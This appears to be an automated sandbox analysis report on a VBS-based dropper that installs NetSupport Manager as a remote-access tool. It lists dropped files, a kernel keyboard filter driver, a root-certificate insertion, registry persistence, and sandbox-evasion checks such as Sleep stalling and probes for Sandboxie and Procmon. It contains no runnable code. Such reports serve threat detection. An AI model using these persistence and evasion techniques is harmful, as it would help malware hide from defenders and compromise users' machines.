                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBEA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF2D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF985.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF8D7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB3B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE94E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEEB5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6B9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE46.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE748.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE66A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA5C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF917.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9FC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED48.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF373.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF691.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBAA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDC7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA9C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE5EC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF179.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0BB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9CD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF314.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC1A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF149.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEF23.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF10A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB6B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE98D.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF710.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA2C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1387.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSIF373.tmp | Code function: 25_2_005DDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError
                                Source: C:\Windows\Installer\MSIF985.tmp | Code function: 27_2_0091DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError
                                Source: C:\Windows\Installer\MSI1387.tmp | Code function: 29_2_00FEDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,GetCurrentDirectoryW,PostMessageW,KiUserCallbackDispatcher,Sleep
                                Source: C:\Windows\Installer\MSI1387.tmp | File created: C:\Windows\setupact.log

                                Boot Survival

                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Windows\Installer\MSI1387.tmp Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PCIsys
                                Source: C:\Windows\Installer\MSI1387.tmp Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HyperVideo
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D9630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,25_2_005D9630

                                Hooking and other Techniques for Hiding and Protection

                                Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49748
                                Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49750
                                Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49751
                                Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49752
                                Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49753
                                Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49754
                                Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49755
                                Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49756
                                Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49757
                                Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49758
                                Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49759
                                Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49760
                                Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49761
                                Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49762
                                Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49763
                                Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49764
                                Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49765
                                Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49766
                                Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49767
                                Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49768
                                Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49769
                                Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 1773
                                Source: unknown Network traffic detected: HTTP traffic on port 1773 -> 49770
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,25_2_005D44C0
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_009144C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,27_2_009144C0
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FE44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,29_2_00FE44C0
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005C4760 GetModuleFileNameW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,25_2_005C4760
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF373.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSIF985.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI1387.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe; Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmp; Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI23E6.tmp; Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exe; Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Windows\Installer\MSI1387.tmp; Stalling execution: Execution stalls by calling Sleep
                                Source: C:\Windows\Installer\MSIF985.tmp; Stalling execution: Execution stalls by calling Sleep
                                Source: c:\users\user\desktop\pyyidau.vbs.exe; Key value queried: Powershell behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; System information queried: FirmwareTableInformation
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe; Memory allocated: 4AB0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe; Memory allocated: 9D60000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe; Memory allocated: AD90000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe; Memory allocated: CDE0000 memory reserve | memory write watch
                                Source: C:\Windows\Installer\MSI1387.tmp; Code function: 29_2_00FBF9E0 OpenServiceW,GetLastError,SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,SetupDiEnumDeviceInfo,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,SetupDiCallClassInstaller,GetLastError,SetupDiDestroyDeviceInfoList,29_2_00FBF9E0
                                Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                                Source: C:\Windows\SysWOW64\wscript.exe; Window found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe; Window / User API: threadDelayed 9765
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Window / User API: threadDelayed 3206
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Window / User API: threadDelayed 6040
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Window / User API: threadDelayed 1045
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Window / User API: threadDelayed 374
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe; Window / User API: threadDelayed 5240
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpEvaded block: after key decision
                                Source: C:\Windows\Installer\MSI1387.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSIF985.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSIF373.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSIF985.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI1387.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSIF373.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSIF373.tmpAPI coverage: 3.2 %
                                Source: C:\Windows\Installer\MSIF985.tmpAPI coverage: 3.2 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI coverage: 5.9 %
                                Source: C:\Windows\Installer\MSI1387.tmpAPI coverage: 9.3 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep count: 3206 > 30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep time: -128240s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep count: 6040 > 30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep time: -241600s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5224Thread sleep time: -41800s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 7508Thread sleep time: -37400s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 7508Thread sleep time: -524000s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 4336Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
